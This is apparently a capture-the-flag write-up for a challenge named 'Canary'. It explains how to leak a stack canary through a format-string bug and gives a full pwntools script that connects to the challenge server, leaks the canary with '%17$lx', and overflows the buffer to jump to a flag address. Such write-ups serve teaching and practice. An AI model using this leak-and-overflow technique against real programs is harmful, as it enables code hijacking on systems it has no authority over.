Canary
Use pattern.py to flood the second input, put a breakpoint at the line in greet which compares the canaries. Check rax using gdb, feed that back into pattern.py, 56 bytes before canary. Fuzz format string output until you find the one that's always 8 bytes long, that's the canary Make a script that leaks the canary then overflows the buffer with
56 junk bytes + canary + 8 junk bytes + flag address
from pwn import *
import re
e = ELF("./canary")
p = remote("shell.actf.co" ,20701)
for _ in range(23):
p.recvline()
p.recvline()
p.sendline("%17$lx")
flagaddr = 0x0000000000400787
output = p.recvline()
num = re.findall("Nice to meet you, (.*)!", output)
canary = int(num[0], 16)
log.info("Canary: " + hex(canary))
firstpad = 'A' * 56 #Junk before the canary
canaryString = p64(canary)
neweip = p64(flagaddr)
lastpad = 'B' * 8
payload = firstpad + canaryString + lastpad + neweip
p.sendline(payload)
log.info("Response: " + p.recvline())
Last modified 3yr ago